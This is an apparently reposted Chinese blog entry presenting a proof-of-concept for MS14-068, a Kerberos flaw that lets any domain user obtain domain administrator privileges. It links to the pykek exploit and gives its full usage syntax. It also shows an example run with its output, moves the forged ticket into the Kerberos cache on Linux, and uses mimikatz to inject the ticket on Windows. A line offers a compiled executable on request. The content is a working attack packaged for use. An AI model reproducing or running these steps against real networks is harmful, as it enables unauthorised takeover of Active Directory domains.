zoukankan      html  css  js  c++  java
  • MS14-068 privilege escalation PoC: 可以让任何域内用户提升为域管理员

     

     

    MS14-068 privilege escalation PoC: 可以让任何域内用户提升为域管理员

    http://zone.wooyun.org/content/17102

    https://www.t00ls.net/thread-28706-1-1.html

    https://github.com/bidord/pykek 

    ms14-068.py 

    Exploits MS14-680 vulnerability on an un-patched domain controler of an Active Directory domain to get a Kerberos ticket for an existing domain user account with the privileges of the following domain groups : 

    Domain Users (513) 
    Domain Admins (512) 
    Schema Admins (518) 
    Enterprise Admins (519) 
    Group Policy Creator Owners (520) 

    USAGE: 

    ms14-068.py -u <userName>@<domainName> -s <userSid> -d <domainControlerAddr> 

    OPTIONS: 
        -p <clearPassword> 
    --rc4 <ntlmHash> 
    Example usage : 

    Linux (tested with samba and MIT Kerberos) 

    root@kali:~/sploit/pykek# python ms14-068.py -u user-a-1@dom-a.loc -s S-1-5-21-557603841-771695929-1514560438-1103 -d dc-a-2003.dom-a.loc 
    Password: 
      [+] Building AS-REQ for dc-a-2003.dom-a.loc... Done! 
      [+] Sending AS-REQ to dc-a-2003.dom-a.loc... Done! 
      [+] Receiving AS-REP from dc-a-2003.dom-a.loc... Done! 
      [+] Parsing AS-REP from dc-a-2003.dom-a.loc... Done! 
      [+] Building TGS-REQ for dc-a-2003.dom-a.loc... Done! 
      [+] Sending TGS-REQ to dc-a-2003.dom-a.loc... Done! 
      [+] Receiving TGS-REP from dc-a-2003.dom-a.loc... Done! 
      [+] Parsing TGS-REP from dc-a-2003.dom-a.loc... Done! 
      [+] Creating ccache file 'TGT_user-a-1@dom-a.loc.ccache'... Done! 
    root@kali:~/sploit/pykek# mv TGT_user-a-1@dom-a.loc.ccache /tmp/krb5cc_0


    On Windows 

    python.exe ms14-068.py -u user-a-1@dom-a.loc -s S-1-5-21-557603841-771695929-1514560438-1103 -d dc-a-2003.dom-a.loc 
    mimikatz.exe "kerberos::ptc TGT_user-a-1@dom-a.loc.ccache" exit`

    exe版土司已发,需要的可以联系我。

  • 相关阅读:
    android 圆角图片的实现
    navigationView 的使用和布局文件的绑定
    android listview 的监听事件
    android第三方框架 xlistview 的使用
    android Baseadapter 和 ViewHolder的使用
    android 调用电话功能
    android 颜色对照
    Android_menu_SubMenu
    Android_menu_optionMenu
    Android_Menu_contextMenu
  • 原文地址:https://www.cnblogs.com/Le30bjectNs11/p/4158497.html
Copyright © 2011-2022 走看看